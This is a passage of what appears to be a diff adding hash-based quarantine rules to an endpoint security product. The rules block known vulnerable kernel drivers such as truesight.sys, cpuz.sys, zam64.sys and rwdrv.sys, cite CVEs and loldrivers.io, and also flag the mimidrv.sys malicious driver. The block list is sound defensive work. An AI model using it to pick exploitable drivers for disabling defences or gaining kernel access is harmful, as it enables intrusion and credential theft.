"2026-03-23T11:45:30.832189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ce04a15e86044d60813727ddf54465b4a6509d356048ba5c99bd5131c03dd45", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3353a34-6600-5f6f-a92e-a5a123f3dbb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829505Z", + "creation_date": "2026-03-23T11:45:31.829507Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd1ff111e962cd5ddb714bcf49348258ba83726e7c58779ac32ecfebc0377a65", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "a342e108-037e-57a2-831b-989bf86ceffa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497984Z", + "creation_date": "2026-03-23T11:45:31.497987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "814edc8773210d0ee42edea1d31884a3595fd6a0c366fbe383e8b389658373b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a34dcdbb-ff26-557a-917c-74411cd7e0eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489306Z", + "creation_date": "2026-03-23T11:45:31.489309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0b254882e39d7888ae195eca0be81ea95ca6f21e522d2afeaf6be0426324055", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a360d8ef-67ec-59cb-b31a-2125779be047", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971506Z", + "creation_date": "2026-03-23T11:45:29.971508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ceb1bf90d8652dac481fba362e5c3a6548a116897e729733f2be27f4edc5fc1f", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a36693c2-9e06-5e6d-b242-e5805e264d99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, 
+ "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144090Z", + "creation_date": "2026-03-23T11:45:31.144092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05c84614bb901b97087dd7d44c839e5dae95982eae8bd8b2e8f354aff8e4c551", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a367a6f5-fd09-5ec2-8f28-4d003d586ca1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829451Z", + "creation_date": "2026-03-23T11:45:31.829453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fec113f2164c7c0570b4e465488812beb4000e97d19844b87e4540f9c3c3dc43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a36817f6-436b-545a-af02-57748ebdfa9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819840Z", + "creation_date": "2026-03-23T11:45:31.819843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2224d56a26690856ecc3ee84eecd389a30e530863432d39303356a3e40557d9f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a36b6e88-d531-5679-b4cd-ddd7f351b827", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458051Z", + "creation_date": "2026-03-23T11:45:30.458054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca34f945117ec853a713183fa4e8cf85ea0c2c49ca26e73d869fee021f7b491d", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a373e9a8-f486-5ace-ae42-58e91460c06e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474359Z", + "creation_date": "2026-03-23T11:45:30.474362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "330941d4b4c310814278afb3d07f7191470c7da06f694342797dc6a2eb37c5be", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) 
[https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a376fab5-1320-517a-b421-48fdf32344d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142185Z", + "creation_date": "2026-03-23T11:45:31.142187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3be5749132be41e14fad0b9b0bbfbcaf2bcaff3aa1475ebb45195dce47c25506", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a378fa8e-d59e-5a75-adb4-e0579451cdb7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611411Z", + "creation_date": 
"2026-03-23T11:45:29.611412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e9099b95b2074fecc6efa6d59552651b1e082aaa3612889f417064d378a797f", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a37ae96a-2f21-5b90-b5d0-df43e2fb5765", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813721Z", + "creation_date": "2026-03-23T11:45:31.813723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0de1e090b5ab2d423652760275bee65b5544a9261165dada553ef83f60f4a2f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a37b5bb8-c511-53ff-82ec-64aa282c4459", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474895Z", + "creation_date": "2026-03-23T11:45:30.474898Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81017af32ebdaf0bc0878a8057bc6b8bd3848eb21aca324cd56b27faa1df7377", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a385a5d2-3ed7-5e12-8dab-dae3c1b1acb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829358Z", + "creation_date": "2026-03-23T11:45:30.829360Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829366Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd83141ba59a56b674157ef969c9217c62ca3199f498cf4ea32e4010cceae49d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a38b8307-e518-5612-90e2-11824c13fdcc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456781Z", + "creation_date": "2026-03-23T11:45:30.456784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2e1a3dd0dfb3477a3e855368b23d12b8818df8fa3bc3508abf069a0873d6bf8", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a390c2d9-5b85-58da-bbe5-f3319e88fd5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818559Z", + "creation_date": "2026-03-23T11:45:30.818561Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "748ccadb6bf6cdf4c5a5a1bb9950ee167d8b27c5817da71d38e2bc922ffce73d", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a392be01-da71-5d6d-b087-f3fadea0aa13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484933Z", + "creation_date": "2026-03-23T11:45:31.484937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1416327acf720388fef7728b808a47db061d0bc98798aa3250ab8d724e2e493d", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a395f25f-69e3-5eb4-b662-1a691a5365c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617555Z", + "creation_date": "2026-03-23T11:45:29.617557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617563Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a29adcc53553499e1c72bfa6595c94284aeb1d68552f964d90d03fa304df4fbf", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a396a5e3-ab83-50ce-b84c-d1b4092ff7d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471285Z", + "creation_date": "2026-03-23T11:45:30.471290Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83fbf5d46cff38dd1c0f83686708b3bd6a3a73fddd7a2da2b5a3acccd1d9359c", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a39df2e5-f8fe-5c9b-a1a5-bc80d7be892b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824628Z", + "creation_date": "2026-03-23T11:45:31.824630Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1912df289ebcd827d07c50f690902ad0ab1ca0921ddd5da4f4fcee5034e7525", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3a82e11-79ba-54ff-b68f-af7b78d771ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611028Z", + "creation_date": "2026-03-23T11:45:29.611029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "157ae92541eda2f5035435c63e1654adfa45c06e37b05cbb60d76a63daa93f04", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3b59f21-2719-5110-bdf8-eedbb133c11b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812258Z", + "creation_date": "2026-03-23T11:45:31.812260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a52f4f77c3d124dfb614f83c44d722ae55c55a8bc9aa6e5e879101b456386923", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3c22071-0b31-5780-bc24-6d65f04ceadc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818926Z", + "creation_date": "2026-03-23T11:45:31.818930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "253cb2f36969c990f0960c13135ab20b9e38011a5761cf1cfe1c3e99b9afce0f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a3c3ff84-a30c-5930-87b9-0d7384349373", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465113Z", + "creation_date": "2026-03-23T11:45:30.465116Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 